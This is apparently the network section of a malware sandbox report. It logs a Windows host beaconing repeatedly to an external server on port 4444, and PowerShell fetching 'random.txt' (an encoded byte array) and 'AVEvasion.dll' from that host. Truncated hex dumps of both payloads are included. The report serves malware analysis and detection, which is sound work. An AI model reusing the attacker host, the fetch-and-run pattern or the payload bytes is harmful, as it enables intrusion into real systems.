Jan 15, 2025 16:02:41.410739899 CET | 4444 | 49716 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:41.410989046 CET | 49716 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:41.438072920 CET | 49716 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:41.442940950 CET | 4444 | 49716 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:41.446166039 CET | 49717 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:41.451008081 CET | 4444 | 49717 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:41.451073885 CET | 49717 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:41.454281092 CET | 49717 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:41.459219933 CET | 4444 | 49717 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:41.459292889 CET | 49717 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:46.477639914 CET | 49718 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:46.482706070 CET | 4444 | 49718 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:46.482836962 CET | 49718 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:46.483042955 CET | 49718 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:46.487895966 CET | 4444 | 49718 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:48.103233099 CET | 4444 | 49718 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:48.103349924 CET | 49718 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:48.103418112 CET | 49718 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:48.104031086 CET | 49719 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:48.108316898 CET | 4444 | 49718 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:48.108987093 CET | 4444 | 49719 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:48.109056950 CET | 49719 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:48.109215975 CET | 49719 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:48.114034891 CET | 4444 | 49719 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:49.754895926 CET | 4444 | 49719 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:49.755122900 CET | 49719 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:49.758021116 CET | 49719 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:49.758625984 CET | 49720 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:49.762897968 CET | 4444 | 49719 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:49.763535023 CET | 4444 | 49720 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:49.763607025 CET | 49720 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:49.766815901 CET | 49720 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:49.772788048 CET | 4444 | 49720 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:49.772845984 CET | 49720 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:54.773623943 CET | 49721 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:54.780114889 CET | 4444 | 49721 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:54.780206919 CET | 49721 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:54.780467033 CET | 49721 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:54.785654068 CET | 4444 | 49721 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:56.397423029 CET | 4444 | 49721 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:56.397561073 CET | 49721 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:56.397681952 CET | 49721 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:56.398190975 CET | 49722 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:56.403336048 CET | 4444 | 49721 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:56.403906107 CET | 4444 | 49722 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:56.404000998 CET | 49722 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:56.404227018 CET | 49722 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:56.409034014 CET | 4444 | 49722 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:58.008790016 CET | 4444 | 49722 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:58.014658928 CET | 49722 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:58.014899969 CET | 49722 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:58.015216112 CET | 49723 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:58.019748926 CET | 4444 | 49722 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:58.020097971 CET | 4444 | 49723 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:58.020210981 CET | 49723 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:58.020267963 CET | 49723 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:58.026206970 CET | 4444 | 49723 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:58.026453972 CET | 49723 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:03.042412996 CET | 49724 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:03.047382116 CET | 4444 | 49724 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:03.047875881 CET | 49724 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:03.047875881 CET | 49724 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:03.052696943 CET | 4444 | 49724 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:04.665337086 CET | 4444 | 49724 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:04.668694973 CET | 49724 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:04.668762922 CET | 49724 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:04.669243097 CET | 49725 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:04.673631907 CET | 4444 | 49724 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:04.674055099 CET | 4444 | 49725 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:04.674166918 CET | 49725 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:04.674350023 CET | 49725 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:04.679188013 CET | 4444 | 49725 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:06.304203033 CET | 4444 | 49725 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:06.304420948 CET | 49725 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:06.304420948 CET | 49725 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:06.304841042 CET | 49726 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:06.309495926 CET | 4444 | 49725 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:06.309755087 CET | 4444 | 49726 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:06.309871912 CET | 49726 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:06.309988976 CET | 49726 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:06.315196991 CET | 4444 | 49726 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:06.315291882 CET | 49726 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:11.320101023 CET | 49727 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:11.325375080 CET | 4444 | 49727 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:11.325489998 CET | 49727 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:11.325717926 CET | 49727 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:11.330610037 CET | 4444 | 49727 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:12.955821037 CET | 4444 | 49727 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:12.958617926 CET | 49727 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:12.958730936 CET | 49727 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:12.959357023 CET | 49729 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:12.965157986 CET | 4444 | 49727 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:12.965610027 CET | 4444 | 49729 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:12.965730906 CET | 49729 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:12.965944052 CET | 49729 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:12.971883059 CET | 4444 | 49729 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:14.730319977 CET | 4444 | 49729 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:14.730449915 CET | 49729 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:14.730541945 CET | 49729 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:14.731017113 CET | 49730 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:14.735460997 CET | 4444 | 49729 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:14.735822916 CET | 4444 | 49730 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:14.735910892 CET | 49730 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:14.736071110 CET | 49730 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:14.740876913 CET | 4444 | 49730 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:14.740953922 CET | 49730 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:19.742633104 CET | 49731 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:19.747581005 CET | 4444 | 49731 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:19.747682095 CET | 49731 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:19.747951984 CET | 49731 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:19.752777100 CET | 4444 | 49731 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:21.394188881 CET | 4444 | 49731 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:21.394361019 CET | 49731 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:21.394361973 CET | 49731 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:21.394932032 CET | 49732 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:21.399400949 CET | 4444 | 49731 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:21.399789095 CET | 4444 | 49732 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:21.399883986 CET | 49732 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:21.400063992 CET | 49732 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:21.404866934 CET | 4444 | 49732 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:23.005522966 CET | 4444 | 49732 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:23.005686045 CET | 49732 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:23.005764961 CET | 49732 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:23.006226063 CET | 49733 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:23.010993004 CET | 4444 | 49732 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:23.011113882 CET | 4444 | 49733 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:23.011189938 CET | 49733 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:23.011229992 CET | 49733 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:23.016313076 CET | 4444 | 49733 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:23.016387939 CET | 49733 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:28.026510954 CET | 49734 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:28.031493902 CET | 4444 | 49734 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:28.031590939 CET | 49734 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:28.031933069 CET | 49734 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:28.036753893 CET | 4444 | 49734 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:29.647196054 CET | 4444 | 49734 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:29.647376060 CET | 49734 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:29.647376060 CET | 49734 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:29.647793055 CET | 49735 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:29.652301073 CET | 4444 | 49734 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:29.652693033 CET | 4444 | 49735 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:29.654731989 CET | 49735 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:29.654958963 CET | 49735 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:29.659761906 CET | 4444 | 49735 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:31.255402088 CET | 4444 | 49735 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:31.258099079 CET | 49735 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:31.258153915 CET | 49735 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:31.258721113 CET | 49742 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:31.263042927 CET | 4444 | 49735 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:31.263654947 CET | 4444 | 49742 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:31.266676903 CET | 49742 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:31.266716957 CET | 49742 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:31.271687984 CET | 4444 | 49742 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:31.274638891 CET | 49742 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:36.274333000 CET | 49773 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:36.279185057 CET | 4444 | 49773 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:36.280577898 CET | 49773 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:36.281064034 CET | 49773 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:36.285800934 CET | 4444 | 49773 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:37.912441015 CET | 4444 | 49773 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:37.912503958 CET | 49773 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:37.912626982 CET | 49773 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:37.913053989 CET | 49784 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:37.917361021 CET | 4444 | 49773 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:37.917876005 CET | 4444 | 49784 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:37.917932034 CET | 49784 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:37.918277025 CET | 49784 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:37.923058987 CET | 4444 | 49784 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:39.538748026 CET | 4444 | 49784 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:39.542031050 CET | 49784 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:39.568562984 CET | 49784 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:39.569288015 CET | 49794 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:39.573401928 CET | 4444 | 49784 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:39.574043036 CET | 4444 | 49794 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:39.574127913 CET | 49794 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:39.575597048 CET | 49794 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:39.580565929 CET | 4444 | 49794 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:03:39.582638979 CET | 49794 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:03:47.613157034 CET | 49704 | 80 | 192.168.2.8 | 158.101.196.44
                          • 158.101.196.44
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49704 | 158.101.196.44 | 80 | 3648 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 16:02:19.997122049 CET | 169 | OUT | GET /random.txt HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                          Host: 158.101.196.44
                          Connection: Keep-Alive
Jan 15, 2025 16:02:20.623145103 CET | 1236 | IN | HTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:02:20 GMT
                          Server: Apache/2.4.6 ()
                          Last-Modified: Tue, 26 Apr 2022 14:58:15 GMT
                          ETag: "1060-5dd8fec1ef0be"
                          Accept-Ranges: bytes
                          Content-Length: 4192
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/plain; charset=UTF-8
                          Data Raw: 30 78 34 31 2c 20 30 78 38 64 2c 20 30 78 66 31 2c 20 30 78 66 39 2c 20 30 78 66 35 2c 20 30 78 31 61 2c 20 30 78 64 36 2c 20 30 78 35 36 2c 20 30 78 30 34 2c 20 30 78 64 66 2c 20 30 78 35 37 2c 20 30 78 66 64 2c 20 30 78 66 33 2c 20 30 78 66 39 2c 20 30 78 66 34 2c 20 30 78 32 30 2c 20 30 78 61 63 2c 20 30 78 39 61 2c 20 30 78 61 64 2c 20 30 78 65 32 2c 20 30 78 35 35 2c 20 30 78 36 64 2c 20 30 78 65 32 2c 20 30 78 35 35 2c 20 30 78 36 63 2c 20 30 78 63 63 2c 20 30 78 32 62 2c 20 30 78 39 35 2c 20 30 78 66 34 2c 20 30 78 65 35 2c 20 30 78 64 65 2c 20 30 78 61 64 2c 20 30 78 32 61 2c 20 30 78 39 34 2c 20 30 78 64 36 2c 20 30 78 64 66 2c 20 30 78 34 30 2c 20 30 78 34 31 2c 20 30 78 34 63 2c 20 30 78 35 35 2c 20 30 78 34 62 2c 20 30 78 34 32 2c 20 30 78 37 65 2c 20 30 78 35 35 2c 20 30 78 35 35 2c 20 30 78 35 35 2c 20 30 78 61 39 2c 20 30 78 61 32 2c 20 30 78 64 36 2c 20 30 78 35 35 2c 20 30 78 65 61 2c 20 30 78 32 61 2c 20 30 78 34 36 2c 20 30 78 35 39 2c 20 30 78 34 61 2c 20 30 78 36 35 2c 20 30 78 [TRUNCATED]
                          Data Ascii: 0x41, 0x8d, 0xf1, 0xf9, 0xf5, 0x1a, 0xd6, 0x56, 0x04, 0xdf, 0x57, 0xfd, 0xf3, 0xf9, 0xf4, 0x20, 0xac, 0x9a, 0xad, 0xe2, 0x55, 0x6d, 0xe2, 0x55, 0x6c, 0xcc, 0x2b, 0x95, 0xf4, 0xe5, 0xde, 0xad, 0x2a, 0x94, 0xd6, 0xdf, 0x40, 0x41, 0x4c, 0x55, 0x4b, 0x42, 0x7e, 0x55, 0x55, 0x55, 0xa9, 0xa2, 0xd6, 0x55, 0xea, 0x2a, 0x46, 0x59, 0x4a, 0x65, 0xa2, 0xa9, 0xa2, 0xe8, 0xf3, 0xe8, 0xf2, 0xfb, 0xf3, 0xff, 0xea, 0x98, 0x70, 0xcc, 0xea, 0x22, 0xf0, 0xc9, 0xea, 0x22, 0xf0, 0xb1, 0xea, 0x22, 0xf0, 0x89, 0xea, 0x22, 0xd0, 0xf9, 0xef, 0x98, 0x6b, 0xe1, 0xad, 0x1e, 0xe8, 0xe3, 0xea, 0x98, 0x62, 0x05, 0x9e, 0xc8, 0xde, 0xab, 0x8e, 0x89, 0xe3, 0x68, 0x6b, 0xa4, 0xe3, 0xa8, 0x63, 0x4b, 0x4f, 0xfb, 0xe3, 0xf8, 0xea, 0x22, 0xf0, 0x89, 0x29, 0xeb, 0x9e, 0xe1, 0xa3, 0x79, 0xc4, 0x28, 0xda, 0xb1, 0xa9, 0xab, 0xad, 0x2c, 0xd0, 0xa9, 0xa2, 0xa9, 0x29, 0x29, 0x2a, 0xa9, 0xa2, 0xa9, 0xea, 0x2c, 0x62, 0xdd, 0xc5, 0xe1, 0xa3, 0x79, 0xe6, 0x22, 0xe2, 0x89, 0x29
                          Jan 15, 2025 16:02:20.623198032 CET1236INData Raw: 2c 20 30 78 65 31 2c 20 30 78 62 61 2c 20 30 78 65 30 2c 20 30 78 61 33 2c 20 30 78 37 39 2c 20 30 78 66 32 2c 20 30 78 34 61 2c 20 30 78 66 34 2c 20 30 78 65 31 2c 20 30 78 35 64 2c 20 30 78 36 30 2c 20 30 78 65 66 2c 20 30 78 39 38 2c 20 30 78
                          Data Ascii: , 0xe1, 0xba, 0xe0, 0xa3, 0x79, 0xf2, 0x4a, 0xf4, 0xe1, 0x5d, 0x60, 0xef, 0x98, 0x6b, 0xe8, 0x29, 0x9d, 0x2a, 0xe1, 0xa3, 0x7f, 0xea, 0x98, 0x62, 0x05, 0xe3, 0x68, 0x6b, 0xa4, 0xe3, 0xa8, 0x63, 0x91, 0x42, 0xdc, 0x53, 0xe5, 0xa1, 0xe5, 0x86, 0
                          Jan 15, 2025 16:02:20.623234987 CET1236INData Raw: 2c 20 30 78 36 66 2c 20 30 78 61 32 2c 20 30 78 61 39 2c 20 30 78 61 32 2c 20 30 78 61 39 2c 20 30 78 35 64 2c 20 30 78 37 63 2c 20 30 78 34 61 2c 20 30 78 66 37 2c 20 30 78 61 32 2c 20 30 78 61 39 2c 20 30 78 61 32 2c 20 30 78 38 36 2c 20 30 78
                          Data Ascii: , 0x6f, 0xa2, 0xa9, 0xa2, 0xa9, 0x5d, 0x7c, 0x4a, 0xf7, 0xa2, 0xa9, 0xa2, 0x86, 0x91, 0xf3, 0x96, 0xe7, 0xc9, 0xdc, 0xcf, 0xc1, 0xce, 0x9e, 0xe4, 0x84, 0xe5, 0xe1, 0x9a, 0xc8, 0xea, 0xe1, 0x8f, 0xea, 0xc4, 0xde, 0xeb, 0xe2, 0xef, 0xe2, 0xd3, 0
                          Jan 15, 2025 16:02:20.623270988 CET780INData Raw: 2c 20 30 78 36 65 2c 20 30 78 36 33 2c 20 30 78 32 31 2c 20 30 78 62 31 2c 20 30 78 61 39 2c 20 30 78 61 32 2c 20 30 78 65 30 2c 20 30 78 31 38 2c 20 30 78 65 64 2c 20 30 78 35 32 2c 20 30 78 39 63 2c 20 30 78 34 32 2c 20 30 78 61 39 2c 20 30 78
                          Data Ascii: , 0x6e, 0x63, 0x21, 0xb1, 0xa9, 0xa2, 0xe0, 0x18, 0xed, 0x52, 0x9c, 0x42, 0xa9, 0xa2, 0xa9, 0xa2, 0x56, 0x77, 0xe1, 0x5d, 0x66, 0xd6, 0xab, 0x49, 0x03, 0x4a, 0xfc, 0xa2, 0xa9, 0xa2, 0xfa, 0xfb, 0xc3, 0xe2, 0xf3, 0xeb, 0x20, 0x73, 0x68, 0x40, 0
                          Jan 15, 2025 16:02:20.769521952 CET53OUTGET /AVEvasion.dll HTTP/1.1
                          Host: 158.101.196.44
                          Jan 15, 2025 16:02:20.943922043 CET1236INHTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:02:20 GMT
                          Server: Apache/2.4.6 ()
                          Last-Modified: Sun, 11 Dec 2022 17:20:04 GMT
                          ETag: "1600-5ef9098fc4e22"
                          Accept-Ranges: bytes
                          Content-Length: 5632
                          Content-Type: application/octet-stream
                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cd 89 29 e2 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 0e 00 00 00 06 00 00 00 00 00 00 9a 2c 00 00 00 20 00 00 00 40 00 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 47 2c 00 00 4f 00 00 00 00 40 00 00 1c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 0c 00 00 00 64 2b 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL)" 0, @ `G,O@`d+T H.text `.rsrc@@@.reloc`@B{,H!0%+ a _Xi2*0(~ ~~(&% %,o~%-&~s%(+(+(~i~~(i(~~~((&*(*r @ 0*.s*(*&(*BSJBv4.0.30319l#~@#StringsL#USP#GUID`#
                          Jan 15, 2025 16:02:20.943979025 CET1236INData Raw: 42 6c 6f 62 00 00 00 00 00 00 00 02 00 00 01 57 15 02 1c 09 0a 00 00 00 fa 01 33 00 16 00 00 01 00 00 00 16 00 00 00 03 00 00 00 05 00 00 00 0d 00 00 00 16 00 00 00 13 00 00 00 0b 00 00 00 02 00 00 00 01 00 00 00 01 00 00 00 06 00 00 00 01 00 00
                          Data Ascii: BlobW3^9^A~lq U&^&?*1
                          Jan 15, 2025 16:02:20.944016933 CET448INData Raw: 72 47 65 6e 65 72 61 74 65 64 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 74 65 00 54 61 72 67 65 74 46 72 61 6d 65 77 6f 72 6b 41 74 74 72
                          Data Ascii: rGeneratedAttributeDebuggableAttributeAssemblyTitleAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyInformationalVersionAttributeAssemblyConfigurationAttributeCompilationRelaxationsAttributeAssemblyProductAttribute
                          Jan 15, 2025 16:02:20.944056034 CET1236INData Raw: 79 73 74 65 6d 2e 4c 69 6e 71 00 43 68 61 72 00 6c 70 50 61 72 61 6d 65 74 65 72 00 2e 63 74 6f 72 00 2e 63 63 74 6f 72 00 49 6e 74 50 74 72 00 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 00 64 77 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 00
                          Data Ascii: ystem.LinqCharlpParameter.ctor.cctorIntPtrSystem.DiagnosticsdwMillisecondsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesDebuggingModeslpThreadAttributesdwCreationFlagsStringSplitOptionshProcessGetCurrentProcesslp
